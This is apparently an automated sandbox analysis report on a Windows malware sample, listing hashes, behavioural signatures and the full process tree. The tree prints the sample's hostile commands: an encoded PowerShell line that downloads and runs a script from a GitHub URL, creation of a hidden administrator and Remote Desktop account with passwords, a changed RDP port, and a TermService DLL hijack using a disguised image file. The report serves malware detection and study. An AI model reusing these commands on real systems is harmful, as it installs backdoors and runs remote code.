Analysis
- max time kernel: 51s
- max time network: 117s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 08-11-2020 17:46
Static task: static1
Behavioral task: behavioral1
- Sample: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
- Resource: win10v20201028
General
- Target: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
- Size: 3.5MB
- MD5: 7e806fd5ef516e10a4e4a5362fbc600b
- SHA1: edb1b43d7578f170f259958663ace80a01718dc8
- SHA256: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b
- SHA512: 30544680de5f5af999cbbba6d632acb4319c370bf526b23cde5e8f40172b97d885608e5a9b086d1cd2df6ee97cc5bb51bb9bf74a742d5866dcca2c58b6c2dbd8
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
- flow 17: pid 1432 powershell.exe
- flow 19: pid 1432 powershell.exe
- flow 20: pid 1432 powershell.exe
- flow 21: pid 1432 powershell.exe
- flow 23: pid 1432 powershell.exe
- flow 25: pid 1432 powershell.exe
- flow 27: pid 1432 powershell.exe
- flow 29: pid 1432 powershell.exe
- flow 31: pid 1432 powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
- resource \Windows\Branding\mediasrv.png: yara_rule upx
- resource \Windows\Branding\mediasvc.png: yara_rule upx
-
Deletes itself 1 IoCs
Processes:
- pid 3132 powershell.exe
-
Loads dropped DLL 2 IoCs
Processes:
- pid 2316, process 2316
-
Modifies service 2 TTPs 2 IoCs
Processes:
- reg.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters
- reg.exe: Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"
-
Drops file in Program Files directory 4 IoCs
Processes:
- powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
- powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
-
Drops file in Windows directory 19 IoCs
Processes:
- powershell.exe: File created C:\Windows\branding\mediasvc.png
- powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB744.tmp
- powershell.exe: File opened for modification C:\Windows\branding\Basebrd
- powershell.exe: File opened for modification C:\Windows\branding\ShellBrd
- powershell.exe: File opened for modification C:\Windows\branding\mediasvc.png
- powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qwizrqsl.50g.psm1
- powershell.exe: File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB722.tmp
- powershell.exe: File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- powershell.exe: File created C:\Windows\branding\wupsvc.jpg
- powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB701.tmp
- powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- powershell.exe: File created C:\Windows\branding\mediasrv.png
- powershell.exe: File opened for modification C:\Windows\branding\mediasrv.png
- powershell.exe: File opened for modification C:\Windows\branding\wupsvc.jpg
- powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_10qtnxds.3sa.ps1
- powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB712.tmp
- powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB733.tmp
-
Modifies data under HKEY_USERS 217 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
- flow 19: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- flow 21: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
- pid 3132 powershell.exe
- pid 3132 powershell.exe
- pid 3132 powershell.exe
- pid 3132 powershell.exe
- pid 3132 powershell.exe
- pid 3132 powershell.exe
- pid 1432 powershell.exe
- pid 1432 powershell.exe
- pid 1432 powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
- pid 624, process 624
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
-
Suspicious use of WriteProcessMemory 72 IoCs
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    Signatures: Deletes itself; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2dtkmchj\2dtkmchj.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4CFD.tmp" "c:\Users\Admin\AppData\Local\Temp\2dtkmchj\CSC461E9C65B98B431FB3A9C62BD813267E.TMP"
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies service; Modifies registry key
    - [3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - [3] C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net.exe
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc Ghar4f5 /del
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc UeT3dGaB /add
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc UeT3dGaB /add
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc UeT3dGaB /add
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc UeT3dGaB
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc UeT3dGaB
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc UeT3dGaB
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    Signatures: Modifies data under HKEY_USERS
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blacklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C net user wgautilacc 1234
  - [2] C:\Windows\system32\net.exe
    Command line: net user wgautilacc 1234
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 1234
MITRE ATT&CK Matrix ATT&CK v6
Downloads